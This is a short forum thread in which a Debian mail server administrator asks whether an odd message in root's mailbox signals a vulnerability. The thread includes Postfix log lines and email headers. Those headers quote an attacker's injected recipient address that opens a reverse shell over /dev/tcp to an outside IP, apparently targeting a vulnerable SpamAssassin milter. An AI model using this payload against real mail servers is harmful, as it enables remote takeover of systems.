Results 1 to 3 of 3
Hello,
I adminster a new production mail server under Debian GNU/Linux 5.0 lenny. The other day I installed and configured Postfix and Dovecot, with no spam filtering or virus detection ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
- 02-16-2011 #1Just Joined!
- Join Date
- Apr 2008
- Location
- Catalonia
- Posts
- 29
[SOLVED] Debian mail server root mailbox received a strange message
Hello,
I adminster a new production mail server under Debian GNU/Linux 5.0 lenny. The other day I installed and configured Postfix and Dovecot, with no spam filtering or virus detection tools or complements.
Today I noticed that the root mailbox has received a message from blue@dick.com. Is this some vulnerability? I'm not sure whether this represents a security problem or not.
/var/log/mail.log:
Thank you!!Code:Feb 15 11:16:10 postfix/smtpd[31314]: connect from b202.blue.fastwebserver.de[62.141.42.202] Feb 15 11:16:12 postfix/smtpd[31314]: 9AB3E11104B9: client=b202.blue.fastwebserver.de[62.141.42.202] Feb 15 11:16:12 postfix/qmgr[30491]: 9AB3E11104B9: from=<blue@dick.com>, size=405, nrcpt=1 (queue active) Feb 15 11:16:12 postfix/smtpd[31314]: disconnect from b202.blue.fastwebserver.de[62.141.42.202]
Last edited by jordi; 02-16-2011 at 03:48 PM.
- 02-16-2011 #2Just Joined!
- Join Date
- Apr 2008
- Location
- Catalonia
- Posts
- 29
Here is the part of the expanded header:
Code:X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0" Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"@machine.example.com
- 02-16-2011 #3Just Joined!
- Join Date
- Apr 2008
- Location
- Catalonia
- Posts
- 29
It seems that only a certain version of SpamAssassin Milter Plugin is compromised.
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
